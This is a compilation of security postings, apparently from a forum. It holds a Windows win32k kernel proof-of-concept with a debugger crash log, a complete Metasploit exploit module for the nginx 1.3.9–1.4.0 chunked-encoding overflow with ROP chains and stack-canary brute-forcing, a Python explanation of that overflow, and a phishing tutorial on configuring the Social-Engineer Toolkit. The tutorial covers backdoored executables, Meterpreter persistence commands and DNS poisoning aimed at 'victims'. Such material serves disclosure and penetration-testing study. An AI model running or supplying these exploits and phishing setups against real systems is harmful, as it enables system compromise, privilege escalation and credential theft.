     While it's spinning, we clean up in another thread, then patch the thread (we can do this, because it's now in userspace) to trigger the exploit. The first block of pprFlattenRec does something like this:

         if ( pprNew->pprPrev )
             pprNew->pprPrev->pprnext = pprNew;

     Let's make that write to 0xCCCCCCCC.

         DWORD WINAPI WatchdogThread(LPVOID Parameter)
         {
             // This routine waits for a mutex object to timeout, then patches the
             // compromised linked list to point to an exploit. We need to do this.
             LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex @ %p", GetCurrentThreadId(), Mutex);

             if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
                 // It looks like the main thread is stuck in a call to FlattenPath(),
                 // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
                 // up, and then patch the list to trigger our exploit.
                 while (NumRegion--)
                     DeleteObject(Regions[NumRegion]);

                 LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord);

                 InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
             } else {
                 LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
             }

             return 0;
         }

         PathRecord->next  = PathRecord;
         PathRecord->prev  = (PVOID)(0x42424242);
         PathRecord->flags = 0;

         ExploitRecord.next  = NULL;
         ExploitRecord.prev  = 0xCCCCCCCC;
         ExploitRecord.flags = PD_BEZIERS;

     Here's the output on Windows 8:

         kd> g

         *******************************************************************************
         *                                                                             *
         *                        Bugcheck Analysis                                    *
         *                                                                             *
         *******************************************************************************

         Use !analyze -v to get detailed debugging information.

         BugCheck 50, {cccccccc, 1, 8f18972e, 2}

         *** WARNING: Unable to verify checksum for ComplexPath.exe
         *** ERROR: Module load completed but symbols could not be loaded for ComplexPath.exe
         Probably caused by : win32k.sys ( win32k!EPATHOBJ::pprFlattenRec+82 )

         Followup: MachineOwner
         ---------

         nt!RtlpBreakWithStatusInstruction:
         810f46f4 cc              int     3
         kd> kv
         ChildEBP RetAddr  Args to Child
         a03ab494 8111c87d 00000003 c17b60e1 cccccccc nt!RtlpBreakWithStatusInstruction (FPO: [1,0,0])
         a03ab4e4 8111c119 00000003 817d5340 a03ab8e4 nt!KiBugCheckDebugBreak+0x1c (FPO: [Non-Fpo])
         a03ab8b8 810f30ba 00000050 cccccccc 00000001 nt!KeBugCheck2+0x655 (FPO: [6,239,4])
         a03ab8dc 810f2ff1 00000050 cccccccc 00000001 nt!KiBugCheck2+0xc6
         a03ab8fc 811a2816 00000050 cccccccc 00000001 nt!KeBugCheckEx+0x19
         a03ab94c 810896cf 00000001 cccccccc a03aba2c nt! ?? ::FNODOBFM::`string'+0x31868
         a03aba14 8116c4e4 00000001 cccccccc 00000000 nt!MmAccessFault+0x42d (FPO: [4,37,4])
         a03aba14 8f18972e 00000001 cccccccc 00000000 nt!KiTrap0E+0xdc (FPO: [0,0] TrapFrame @ a03aba2c)
         a03abbac 8f103c28 0124eba0 a03abbd8 8f248f79 win32k!EPATHOBJ::pprFlattenRec+0x82 (FPO: [Non-Fpo])
         a03abbb8 8f248f79 1c010779 0016fd04 8f248f18 win32k!EPATHOBJ::bFlatten+0x1f (FPO: [0,1,0])
         a03abc08 8116918c 1c010779 0016fd18 776d7174 win32k!NtGdiFlattenPath+0x61 (FPO: [1,15,4])
         a03abc08 776d7174 1c010779 0016fd18 776d7174 nt!KiFastCallEntry+0x12c (FPO: [0,3] TrapFrame @ a03abc14)
         0016fcf4 76b1552b 0124147f 1c010779 00000040 ntdll!KiFastSystemCallRet (FPO: [0,0,0])
         0016fcf8 0124147f 1c010779 00000040 00000000 GDI32!NtGdiFlattenPath+0xa (FPO: [1,0,0])
         WARNING: Stack unwind information not available. Following frames may be wrong.
         0016fd18 01241ade 00000001 00202b50 00202ec8 ComplexPath+0x147f
         0016fd60 76ee1866 7f0de000 0016fdb0 77716911 ComplexPath+0x1ade
         0016fd6c 77716911 7f0de000 bc1d7832 00000000 KERNEL32!BaseThreadInitThunk+0xe (FPO: [Non-Fpo])
         0016fdb0 777168bd ffffffff 7778560a 00000000 ntdll!__RtlUserThreadStart+0x4a (FPO: [SEH])
         0016fdc0 00000000 01241b5b 7f0de000 00000000 ntdll!_RtlUserThreadStart+0x1c (FPO: [Non-Fpo])
         kd> .trap a03aba2c
         ErrCode = 00000002
         eax=cccccccc ebx=80206014 ecx=80206008 edx=85ae1224 esi=0124eba0 edi=a03abbd8
         eip=8f18972e esp=a03abaa0 ebp=a03abbac iopl=0         nv up ei ng nz na pe nc
         cs=0008  ss=0010  ds=0023  es=0023  fs=0030  gs=0000             efl=00010286
         win32k!EPATHOBJ::pprFlattenRec+0x82:
         8f18972e 8918            mov     dword ptr [eax],ebx  ds:0023:cccccccc=????????
         kd> vertarget
         Windows 8 Kernel Version 9200 MP (1 procs) Free x86 compatible
         Product: WinNt, suite: TerminalServer SingleUserTS
         Built by: 9200.16581.x86fre.win8_gdr.130410-1505
         Machine Name:
         Kernel base = 0x81010000 PsLoadedModuleList = 0x811fde48
         Debug session time: Mon May 20 14:17:20.259 2013 (UTC - 7:00)
         System Uptime: 0 days 0:02:30.432
         kd> .bugcheck
         Bugcheck code 00000050
         Arguments cccccccc 00000001 8f18972e 00000002

     Demo code attached.

     I have a working exploit that grants SYSTEM on all currently supported versions of Windows. Code is available on request to students from reputable schools. If nobody else on the list can figure out the final details, then I've lost faith in the next generation.

     Tavis.

         #ifndef WIN32_NO_STATUS
         # define WIN32_NO_STATUS
         #endif
         #include <windows.h>
         #include <assert.h>
         #include <stdio.h>
         #include <stddef.h>
         #include <winnt.h>
         #ifdef WIN32_NO_STATUS
         # undef WIN32_NO_STATUS
         #endif
         #include <ntstatus.h>

         #pragma comment(lib, "gdi32")
         #pragma comment(lib, "kernel32")
         #pragma comment(lib, "user32")

         #define MAX_POLYPOINTS (8192 * 3)
         #define MAX_REGIONS 8192
         #define CYCLE_TIMEOUT 10000

         //
         // win32k!EPATHOBJ::pprFlattenRec uninitialized Next pointer testcase.
         //
         // Tavis Ormandy <taviso () cmpxchg8b com>, March 2013
         //

         POINT  Points[MAX_POLYPOINTS];
         BYTE   PointTypes[MAX_POLYPOINTS];
         HRGN   Regions[MAX_REGIONS];
         ULONG  NumRegion;
         HANDLE Mutex;

         // Log levels.
         typedef enum { L_DEBUG, L_INFO, L_WARN, L_ERROR } LEVEL, *PLEVEL;

         BOOL LogMessage(LEVEL Level, PCHAR Format, ...);

         // Copied from winddi.h from the DDK
         #define PD_BEGINSUBPATH 0x00000001
         #define PD_ENDSUBPATH   0x00000002
         #define PD_RESETSTYLE   0x00000004
         #define PD_CLOSEFIGURE  0x00000008
         #define PD_BEZIERS      0x00000010

         typedef struct _POINTFIX {
             ULONG x;
             ULONG y;
         } POINTFIX, *PPOINTFIX;

         // Approximated from reverse engineering.
         typedef struct _PATHRECORD {
             struct _PATHRECORD *next;
             struct _PATHRECORD *prev;
             ULONG    flags;
             ULONG    count;
             POINTFIX points[0];
         } PATHRECORD, *PPATHRECORD;

         PPATHRECORD PathRecord;
         PATHRECORD  ExploitRecord;

         DWORD WINAPI WatchdogThread(LPVOID Parameter)
         {
             // This routine waits for a mutex object to timeout, then patches the
             // compromised linked list to point to an exploit. We need to do this.
             LogMessage(L_INFO, "Watchdog thread %u waiting on Mutex @ %p", GetCurrentThreadId(), Mutex);

             if (WaitForSingleObject(Mutex, CYCLE_TIMEOUT) == WAIT_TIMEOUT) {
                 // It looks like the main thread is stuck in a call to FlattenPath(),
                 // because the kernel is spinning in EPATHOBJ::bFlatten(). We can clean
                 // up, and then patch the list to trigger our exploit.
                 while (NumRegion--)
                     DeleteObject(Regions[NumRegion]);

                 LogMessage(L_ERROR, "InterlockedExchange(%p, %p);", &PathRecord->next, &ExploitRecord);

                 InterlockedExchangePointer(&PathRecord->next, &ExploitRecord);
             } else {
                 LogMessage(L_ERROR, "Mutex object did not timeout, list not patched");
             }

             return 0;
         }

         int main(int argc, char **argv)
         {
             HANDLE Thread;
             HDC    Device;
             ULONG  Size;
             HRGN   Buffer;
             ULONG  PointNum;
             ULONG  Count;

             // Create our PATHRECORD in userspace we will get added to the EPATHOBJ
             // pathrecord chain.
             PathRecord = VirtualAlloc(NULL, sizeof(PATHRECORD), MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

             LogMessage(L_INFO, "Allocated userspace PATHRECORD @ %p", PathRecord);

             // Initialise with recognisable debugging values.
             FillMemory(PathRecord, sizeof(PATHRECORD), 0xCC);

             PathRecord->next = PathRecord;
             PathRecord->prev = (PVOID)(0x42424242);

             // You need the PD_BEZIERS flag to enter EPATHOBJ::pprFlattenRec() from
             // EPATHOBJ::bFlatten(). We don't set it so that we can trigger an infinite
             // loop in EPATHOBJ::bFlatten().
             PathRecord->flags = 0;

             LogMessage(L_INFO, "  ->next  @ %p", PathRecord->next);
             LogMessage(L_INFO, "  ->prev  @ %p", PathRecord->prev);
             LogMessage(L_INFO, "  ->flags @ %u", PathRecord->flags);

             ExploitRecord.next  = NULL;
             ExploitRecord.prev  = 0xCCCCCCCC;
             ExploitRecord.flags = PD_BEZIERS;

             LogMessage(L_INFO, "Creating complex bezier path with %#x", (ULONG)(PathRecord) >> 4);

             // Generate a large number of Bezier Curves made up of pointers to our
             // PATHRECORD object.
             for (PointNum = 0; PointNum < MAX_POLYPOINTS; PointNum++) {
                 Points[PointNum].x   = (ULONG)(PathRecord) >> 4;
                 Points[PointNum].y   = (ULONG)(PathRecord) >> 4;
                 PointTypes[PointNum] = PT_BEZIERTO;
             }

             // Switch to a dedicated desktop so we don't spam the visible desktop with
             // our Lines (Not required, just stops the screen from redrawing slowly).
             SetThreadDesktop(CreateDesktop("DontPanic", NULL, NULL, 0, GENERIC_ALL, NULL));

             Mutex = CreateMutex(NULL, TRUE, NULL);

             // Get a handle to this Desktop.
             Device = GetDC(NULL);

             // Spawn a thread to cleanup
             Thread = CreateThread(NULL, 0, WatchdogThread, NULL, 0, NULL);

             // We need to cause a specific AllocObject() to fail to trigger the
             // exploitable condition. To do this, I create a large number of rounded
             // rectangular regions until they start failing. I don't think it matters
             // what you use to exhaust paged memory, there is probably a better way.
             //
             // I don't use the simpler CreateRectRgn() because it leaks a GDI handle on
             // failure. Seriously, do some damn QA Microsoft, wtf.
             for (Size = 1 << 26; Size; Size >>= 1) {
                 while (Regions[NumRegion] = CreateRoundRectRgn(0, 0, 1, Size, 1, 1))
                     NumRegion++;
             }

             LogMessage(L_INFO, "Allocated %u HRGN objects", NumRegion);
             LogMessage(L_INFO, "Flattening curves...");

             // Begin filling the free list with our points.
             for (PointNum = MAX_POLYPOINTS; PointNum; PointNum -= 3) {
                 BeginPath(Device);
                 PolyDraw(Device, Points, PointTypes, PointNum);
                 EndPath(Device);
                 FlattenPath(Device);
                 FlattenPath(Device);
                 EndPath(Device);
             }

             LogMessage(L_INFO, "No luck, cleaning up");

             // If we reach here, we didn't trigger the condition. Let the other thread know.
             ReleaseMutex(Mutex);
             ReleaseDC(NULL, Device);
             WaitForSingleObject(Thread, INFINITE);

             return 0;
         }

         // A quick logging routine for debug messages.
         BOOL LogMessage(LEVEL Level, PCHAR Format, ...)
         {
             CHAR    Buffer[1024] = {0};
             va_list Args;

             va_start(Args, Format);
             vsnprintf_s(Buffer, sizeof Buffer, _TRUNCATE, Format, Args);
             va_end(Args);

             switch (Level) {
                 case L_DEBUG: fprintf(stdout, "[?] %s\n", Buffer);   break;
                 case L_INFO:  fprintf(stdout, "[+] %s\n", Buffer);   break;
                 case L_WARN:  fprintf(stderr, " [*] %s\n", Buffer);  break;
                 case L_ERROR: fprintf(stderr, "[!] %s\n\a", Buffer); break;
             }

             fflush(stdout);
             fflush(stderr);

             return TRUE;
         }

     Source: 1337day Inj3ct0r Exploit Database : vulnerability : 0day : shellcode by Inj3ct0r Team
  8. Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow

Authored by Greg MacManus, hal, saelo | Site metasploit.com

This Metasploit module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx. The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by supplying an overly long hex value as chunked block size. This value is later used when determining the number of bytes to read into a stack buffer, thus the overflow becomes possible.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##

require 'msf/core'

class Metasploit4 < Msf::Exploit::Remote

  include Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow',
      'Description'    => %q{
        This module exploits a stack buffer overflow in versions 1.3.9 to 1.4.0 of nginx.
        The exploit first triggers an integer overflow in the ngx_http_parse_chunked() by
        supplying an overly long hex value as chunked block size. This value is later used
        when determining the number of bytes to read into a stack buffer, thus the overflow
        becomes possible.
      },
      'Author'         =>
        [
          'Greg MacManus', # original discovery
          'hal',           # Metasploit module
          'saelo'          # Metasploit module
        ],
      'DisclosureDate' => 'May 07 2013',
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['CVE', '2013-2028'],
          ['OSVDB', '93037'],
          ['URL', 'http://nginx.org/en/security_advisories.html'],
          ['URL', 'http://packetstormsecurity.com/files/121560/Nginx-1.3.9-1.4.0-Stack-Buffer-Overflow.html']
        ],
      'Privileged'     => false,
      'Payload'        =>
        {
          'BadChars' => "\x0d\x0a",
        },
      'Arch'           => ARCH_CMD,
      'Platform'       => 'unix',
      'Targets'        =>
        [
          [ 'Ubuntu 13.04 32bit - nginx 1.4.0',
            {
              'CanaryOffset' => 5050,
              'Offset'       => 12,
              'Writable'     => 0x080c7330, # .data from nginx
              :dereference_got_callback => :dereference_got_ubuntu_1304,
              :store_callback => :store_ubuntu_1304,
            }
          ],
          [ 'Debian Squeeze 32bit - nginx 1.4.0',
            {
              'Offset'   => 5130,
              'Writable' => 0x080b4360, # .data from nginx
              :dereference_got_callback => :dereference_got_debian_squeeze,
              :store_callback => :store_debian_squeeze
            }
          ],
        ],
      'DefaultTarget'  => 0
    ))

    register_options([
      OptPort.new('RPORT', [true, "The remote HTTP server port", 80])
    ], self.class)

    register_advanced_options(
      [
        OptInt.new("CANARY", [false, "Use this value as stack canary instead of brute forcing it", 0xffffffff ]),
      ], self.class)
  end

  def peer
    "#{rhost}:#{rport}"
  end

  def check
    begin
      res = send_request_fixed(nil)
      if res =~ /^Server: nginx\/(1\.3\.(9|10|11|12|13|14|15|16)|1\.4\.0)/m
        return Exploit::CheckCode::Appears
      elsif res =~ /^Server: nginx/m
        return Exploit::CheckCode::Detected
      end
    rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
      print_error("#{peer} - Connection failed")
    end
    return Exploit::CheckCode::Unknown
  end

  #
  # Generate a random chunk size that will always result
  # in a negative 64bit number when being parsed
  #
  def random_chunk_size(bytes=16)
    return bytes.times.map{ (rand(0x8) + 0x8).to_s(16) }.join
  end

  def send_request_fixed(data)
    connect

    request  = "GET / HTTP/1.1\r\n"
    request << "Host: #{Rex::Text.rand_text_alpha(16)}\r\n"
    request << "Transfer-Encoding: Chunked\r\n"
    request << "\r\n"
    request << "#{data}"

    sock.put(request)

    res = nil
    begin
      res = sock.get_once(-1, 0.5)
    rescue EOFError => e
      # Ignore
    end

    disconnect
    return res
  end

  def store_ubuntu_1304(address, value)
    chain = [
      0x0804c415,              # pop ecx ; add al, 29h ; ret
      address,                 # address
      0x080b9a38,              # pop eax ; ret
      value.unpack('V').first, # value
      0x080a9dce,              # mov [ecx], eax ; mov [ecx+4], edx ; mov eax, 0 ; ret
    ]
    return chain.pack('V*')
  end

  def dereference_got_ubuntu_1304
    chain = [
      0x08094129,          # pop esi; ret
      0x080c5090,          # GOT for localtime_r
      0x0804c415,          # pop ecx ; add al, 29h ; ret
      0x001a4b00,          # Offset to system
      0x080c360a,          # add ecx, [esi] ; adc al, 41h ; ret
      0x08076f63,          # push ecx ; add al, 39h ; ret
      0x41414141,          # Garbage return address
      target['Writable'],  # ptr to .data where contents have been stored
    ]
    return chain.pack('V*')
  end

  def store_debian_squeeze(address, value)
    chain = [
      0x08050d93,              # pop edx ; add al 0x83 ; ret
      value.unpack('V').first, # value
      0x08067330,              # pop eax ; ret
      address,                 # address
      0x08070e94,              # mov [eax] edx ; mov eax 0x0 ; pop ebp ; ret
      0x41414141,              # ebp
    ]
    return chain.pack('V*')
  end

  def dereference_got_debian_squeeze
    chain = [
      0x0804ab34,                # pop edi ; pop ebp ; ret
      0x080B4128 - 0x5d5b14c4,   # 0x080B4128 => GOT for localtime_r; 0x5d5b14c4 => Adjustment
      0x41414141,                # padding (ebp)
      0x08093c75,                # mov ebx, edi ; dec ecx ; ret
      0x08067330,                # pop eax # ret
      0xfffb0c80,                # offset
      0x08078a46,                # add eax, [ebx+0x5d5b14c4] # ret
      0x0804a3af,                # call eax # system
      target['Writable']         # ptr to .data where contents have been stored
    ]
    return chain.pack("V*")
  end

  def store(buf, address, value)
    rop = target['Rop']
    chain = rop['store']['chain']
    chain[rop['store']['address_offset']] = address
    chain[rop['store']['value_offset']] = value.unpack('V').first
    buf << chain.pack('V*')
  end

  def dereference_got
    unless self.respond_to?(target[:store_callback]) and self.respond_to?(target[:dereference_got_callback])
      fail_with(Exploit::Failure::NoTarget, "Invalid target specified: no callback functions defined")
    end

    buf = ""
    command = payload.encoded

    i = 0
    while i < command.length
      buf << self.send(target[:store_callback], target['Writable'] + i, command[i, 4].ljust(4, ";"))
      i = i + 4
    end

    buf << self.send(target[:dereference_got_callback])
    return buf
  end

  def exploit
    data = random_chunk_size(1024)

    if target['CanaryOffset'].nil?
      data << Rex::Text.rand_text_alpha(target['Offset'] - data.size)
    else
      if not datastore['CANARY'] == 0xffffffff
        print_status("#{peer} - Using 0x%08x as stack canary" % datastore['CANARY'])
        canary = datastore['CANARY']
      else
        print_status("#{peer} - Searching for stack canary")
        canary = find_canary
        if canary.nil? || canary == 0x00000000
          fail_with(Exploit::Failure::Unknown, "#{peer} - Unable to find stack canary")
        else
          print_good("#{peer} - Canary found: 0x%08x\n" % canary)
        end
      end

      data << Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
      data << [canary].pack('V')
      data << Rex::Text.rand_text_hex(target['Offset'])
    end

    data << dereference_got

    begin
      send_request_fixed(data)
    rescue Errno::ECONNRESET => e
      # Ignore
    end

    handler
  end

  def find_canary
    # First byte of the canary is already known
    canary = "\x00"
    print_status("#{peer} - Assuming byte 0 0x%02x" % 0x00)

    # We are going to bruteforce the next 3 bytes one at a time
    3.times do |c|
      print_status("#{peer} - Bruteforcing byte #{c + 1}")
      0.upto(255) do |i|
        data = random_chunk_size(1024)
        data << Rex::Text.rand_text_alpha(target['CanaryOffset'] - data.size)
        data << canary
        data << i.chr

        unless send_request_fixed(data).nil?
          print_good("#{peer} - Byte #{c + 1} found: 0x%02x" % i)
          canary << i.chr
          break
        end
      end
    end

    if canary == "\x00"
      return nil
    else
      return canary.unpack('V').first
    end
  end
end

Sursa: Nginx HTTP Server 1.3.9-1.4.0 Chuncked Encoding Stack Buffer Overflow – Packet Storm
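The module above builds its chunk size from hex digits in the range 8..f and relies on the parsed value coming out negative ("will always result in a negative 64bit number when being parsed"). The following is an added example, not part of the Metasploit module and not nginx source code: a Python model of a `size = size * 16 + digit` accumulator with 64-bit wraparound, showing why every string `random_chunk_size` produces parses to a negative number, how a signed size slips past a `size < remaining` comparison once the result is used as an unsigned length, and a checked variant that rejects the overflow instead. `STACK_BUF`, `to_int64`, `bytes_to_read_naive`, `bytes_to_read_checked` and `parse_chunk_size_checked` are hypothetical helpers written for this illustration; `random_chunk_size` is a seeded port of the module's method.

```python
import random

INT64_MAX = (1 << 63) - 1
MASK64 = (1 << 64) - 1
STACK_BUF = 4096  # hypothetical size of the receiving stack buffer, not nginx's value


def to_int64(value):
    """Wrap an unbounded Python int to a signed 64-bit value, as C arithmetic does silently."""
    value &= MASK64
    return value - (1 << 64) if value >> 63 else value


def random_chunk_size(nbytes=16, seed=1):
    """Port of the module's random_chunk_size(): every hex digit is in 8..f (seeded for repeatability)."""
    rng = random.Random(seed)
    return "".join(format(rng.randrange(8, 16), "x") for _ in range(nbytes))


def parse_chunk_size_naive(hexstr):
    """The vulnerable pattern: accumulate hex digits into a signed 64-bit size with no overflow check."""
    size = 0
    for ch in hexstr:
        size = to_int64(size * 16 + int(ch, 16))
    return size


def parse_chunk_size_checked(hexstr):
    """Same loop, but stop as soon as the next digit could push the accumulator past INT64_MAX.
    Returns None for a chunk size that must be rejected (hypothetical hardening, not nginx's patch)."""
    size = 0
    for ch in hexstr:
        if size > (INT64_MAX - 15) // 16:
            return None
        size = size * 16 + int(ch, 16)
    return size


def bytes_to_read_naive(chunk_size, remaining=STACK_BUF):
    """Hypothetical length selection: min(chunk, remaining) with a signed comparison, then the
    result is used as size_t. A negative chunk size passes the comparison and becomes huge."""
    n = chunk_size if chunk_size < remaining else remaining
    return n & MASK64


def bytes_to_read_checked(hexstr, remaining=STACK_BUF):
    """Parse with the checked routine and clamp to the buffer; None means reject the request."""
    size = parse_chunk_size_checked(hexstr)
    if size is None:
        return None
    return min(size, remaining)


if __name__ == "__main__":
    evil = random_chunk_size(1024)
    print("naive parse of 1024 digits:", parse_chunk_size_naive(evil))
    print("naive bytes to read:       ", bytes_to_read_naive(parse_chunk_size_naive(evil)))
    print("checked bytes to read:     ", bytes_to_read_checked(evil))
```

The first digit of any 16-digit window being 8 or higher sets bit 63, so the naive accumulator is negative for every string the module sends; with 1024 digits it wraps many times, but only the last sixteen decide the sign. The checked parser refuses the string at its sixteenth digit, which is the cheapest place to stop: before the value is ever compared with a buffer size.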
  9. Phishing and Social Engineering Techniques 2.0

Ahmed Mohamed
May 22, 2013

This is the second part of the phishing and social engineering techniques series. In the first article, we discussed what phishing is, as well as the different types of phishing. We made a demo of a phishing attack using an email spoofing method to convince our victims to click on our links, and finally we had an overview of the Social Engineering Toolkit. Today we are going to talk in detail about the Social Engineering Toolkit configuration, which allows us to customize our configuration according to the attack scenario. Being familiar with the configuration options will give you a view of the full features of SET, so that you can use these features to launch attacks against your victims and convince them to provide the attacker with all the information needed for further attacks.

What is social engineering?

According to Wikipedia: Social engineering, in the context of security, is understood to mean the art of manipulating people into performing actions or divulging confidential information. This is a type of confidence trick for the purpose of information gathering, fraud, or computer system access. It differs from traditional cons in that often the attack is a mere step in a more complex fraud.

Social-Engineer Toolkit

The Social-Engineer Toolkit (SET) was created and written by David Kennedy (ReL1K) and is an open-source Python-driven tool that focuses solely on attacking the weakest link in the information security chain, the human element. The attacks built into the toolkit are designed to be targeted and focused attacks against a person or organization used during a penetration test. The Social-Engineer Toolkit (SET) is included in the latest version of the most popular Linux distribution focused on security, BackTrack. It can also be downloaded through GitHub using the following command: git clone https://github.com/trustedsec/social-engineer-toolkit/.

Social Engineering Toolkit Update

The first step that we should take after installing BackTrack is updating the Social Engineering Toolkit. To do so, open the terminal and change directory to the SET directory, then enter the following command:

root@bt:/pentest/exploits/set# svn update
D config/set_config.py
U config/set_config
U config/update_config.py
U setup.py
A src/fasttrack/delldrac.py
U src/fasttrack/mssql.py
U src/powershell/powershell.py
U src/core/set.py
U src/core/payloadgen/create_payloads.py
U src/core/setcore.py
U src/core/dictionaries.py
U src/core/menu/text.py
U src/core/fasttrack.py
U src/html/spawn.py
U src/html/Signed_Update.jar.orig
U src/html/unsigned/verified_sign.py
U src/html/unsigned/unsigned.jar
D src/webattack/java_applet
U src/webattack/multi_attack/multiattack.py
U src/webattack/harvester/scraper.py
U src/webattack/harvester/harvester.py
U src/webattack/browser_exploits/gen_payload.py
D src/webattack/web_clone/linux
D src/webattack/web_clone/osx
A src/webattack/web_clone/applet.txt
A src/webattack/web_clone/applet.database.old
U src/webattack/web_clone/applet.database
U src/payloads/set_payloads/shell.windows
A src/payloads/set_payloads/pyinjector.binary
U src/payloads/set_payloads/listener.py
U set
U readme/CHANGES
U readme/CREDITS
U readme/README
Updated to revision 1599.

Social Engineering Toolkit configuration

The power of SET is in its configuration file. SET with its default settings works perfectly for most users, but advanced customization will help us make sure that the attack vectors run without problems. So after updating SET, it’s time to edit the SET configuration file. Let’s walk through it. To open the SET configuration file, open the terminal and change the directory to the config folder under the SET directory; you will find the configuration file called set_config. Open it in any text editor.
### Define the path to MetaSploit, for example: /pentest/exploits/framework3
METASPLOIT_PATH=/opt/metasploit/msf3

While looking through the configuration file, you can change any option to get the desired result. In the first option, you can change the path to where Metasploit is located. SET uses Metasploit for the payload creation, file format bugs, and the browser exploit scenarios. By default, the Metasploit location is /opt/metasploit/msf3.

### This will tell what database to use when using the MetaSploit functionality. Default is PostgreSQL
METASPLOIT_DATABASE=postgresql

In this option, you can choose which database Metasploit will use. By default, PostgreSQL is the database.

### How many times SET should encode a payload if you are using standard MetaSploit encoding options
ENCOUNT=4

In this option, you can specify how many times Metasploit should encode the payload using the standard Metasploit encoding option. By default, it encodes four times before sending the payload.

### The browser, however can introduce buggy results when auto migrating.
### NOTE: This will make bypassuac not work properly. Migrate to a different process to get it to work.
AUTO_MIGRATE=OFF

In this option, you can set the auto_migrate option to ON/OFF. ON means that the Meterpreter session will migrate to a different process. For example, if we got a Meterpreter session through a browser attack and the victim closed the browser, then the session would be dead. But if auto_migrate is set to ON, the Meterpreter session will migrate to another running process, so if the attacker closes the browser, the session is still live.

### Custom exe you want to use for Metasploit encoding, this usually has better av
### detection. Currently it is set to legit.binary which is just calc.exe. An example
### you could use would be putty.exe so this field would be /pathtoexe/putty.exe
CUSTOM_EXE=legit.binary

In this option, you can determine which executable will be used for Metasploit encoding. By default, it’s set to legit.binary, which is calc.exe.

### This is for the backdoored executable if you want to keep the executable to still work. Normally
### when legit.binary is used, it will render the application useless. Specifying this will keep the
### application working
BACKDOOR_EXECUTION=ON

In the next option we determine whether we want to keep the executable working. The executable is the one specified at custom_exe, which by default is calc.exe.

### Here we can run multiple Meterpreter scripts once a session is active. This
### may be important if we are sleeping and need to run persistence, try to elevate
### permissions and other tasks in an automated fashion. First turn this trigger on
### then configure the flags. Note that you need to separate the commands by a ;
METERPRETER_MULTI_SCRIPT=OFF
LINUX_METERPRETER_MULTI_SCRIPT=OFF

Here, we can run multiple Meterpreter scripts once a session is active. We turn it ON/OFF here and specify the scripts in the next option.

### What commands do you want to run once a Meterpreter session has been established.
### Be sure if you want multiple commands to separate with a ;. For example you could do
### run getsystem;run hashdump;run persistence to run three different commands
METERPRETER_MULTI_COMMANDS=run persistence -r 192.168.1.5 -p 21 -i 300 -X -A;getsystem
LINUX_METERPRETER_MULTI_COMMANDS=uname;id;cat ~/.ssh/known_hosts

In this option, we can choose which commands will be run once a Meterpreter session has been established. If you want multiple commands, you can separate them with a semicolon “;”.

### This is the port that is used for the iFrame injection using the Metasploit browser attacks.
### By default this port is 8080 however egress filtering may block this. May want to adjust to
### something like 21 or 53
METASPLOIT_IFRAME_PORT=8080

You can use this to determine which port will be used for the iFrame injection while using the Metasploit browser attacks. By default, it will use port 8080. It’s better to change it to a popular port like 21, 53, etc.

### Define to use Ettercap or not when using website attack only - set to ON and OFF
ETTERCAP=OFF
### Ettercap home directory (needed for DNS_spoof)
ETTERCAP_PATH=/usr/share/ettercap
### Specify what interface you want ettercap or DSNiff to listen on, if nothing will default
ETTERCAP_INTERFACE=eth0

Ettercap is a free and open source network security tool for man in the middle attacks on a LAN. It can be used for computer network protocol analysis and security auditing. It runs on various Unix-like operating systems including Linux, Mac OS X, BSD and Solaris, and on Microsoft Windows. It is capable of intercepting traffic on a network segment, capturing passwords, and conducting active eavesdropping against a number of common protocols. The Ettercap options can be used when an attacker is on the same subnet as his victims and he wants to perform DNS poisoning attacks against a subset of IP addresses. When this flag is set to ON, it will poison the entire local subnet and redirect a specific site or all sites to your malicious server. There are three options for Ettercap. The first is used to allow SET to use Ettercap, the second sets the path, and the third identifies the interface on which Ettercap will listen.

### Define to use dsniff or not when using website attack only - set to on and off
### If dsniff is set to on, ettercap will automatically be disabled.
DSNIFF=OFF

Dsniff is a set of password sniffing and network traffic analysis tools written by security researcher and startup founder Dug Song to parse different application protocols and extract relevant information. Dsniff passively monitors a network for interesting data (passwords, e-mail, files, etc.). In this option, you can allow the use of dsniff by setting it ON/OFF, but keep in mind that Ettercap will automatically be disabled.

### SendMail ON or OFF for spoofing email addresses
SENDMAIL=OFF

Sendmail is a general purpose internetwork email routing facility that supports many kinds of mail-transfer and -delivery methods, including the Simple Mail Transfer Protocol (SMTP) used for email transport over the Internet. By setting the sendmail flag to ON, Sendmail can spoof source email addresses. Sendmail must be installed before setting it to ON. It’s installed by default in BackTrack 5.

### Create self-signed Java applets and spoof publisher note this requires you to
### install ---> Java 6 JDK, BT5 or Ubuntu users: apt-get install openjdk-6-jdk
### If this is not installed it will not work. Can also do: apt-get install sun-java6-jdk
SELF_SIGNED_APPLET=OFF

If we set this option to ON, it will allow us to sign the Java applet with whatever name we want. For example, if we are targeting a company called “XYZ”, you can sign the Java applet with “XYZ” to make it look more believable. By default the Java applet is signed by Microsoft; this will require you to install Java’s JDK.

### Use Apache instead of the standard Python web server. This will increase the speed
### of the attack vector.
APACHE_SERVER=OFF
### Path to the Apache web root
APACHE_DIRECTORY=/var/www

If we set this option to ON, SET will use the Apache web server to handle the web requests, because it will increase the speed of the attack. By default SET will use the Python web server. You should also set the Apache root directory, which is /var/www by default.

# TURN ON SSL CERTIFICATES FOR SET SECURE COMMUNICATIONS THROUGH WEB_ATTACK VECTOR
WEBATTACK_SSL=OFF
# PATH TO THE PEM FILE TO UTILIZE CERTIFICATES WITH THE WEB ATTACK VECTOR (REQUIRED)
